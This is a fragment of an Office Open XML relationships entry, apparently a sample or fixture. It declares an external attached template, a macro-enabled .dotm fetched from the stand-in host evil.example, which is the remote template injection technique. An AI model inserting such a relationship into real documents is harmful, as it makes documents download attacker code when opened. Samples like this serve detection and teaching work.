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 Id="rIdT" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://evil.example/t.dotm" TargetMode="Externa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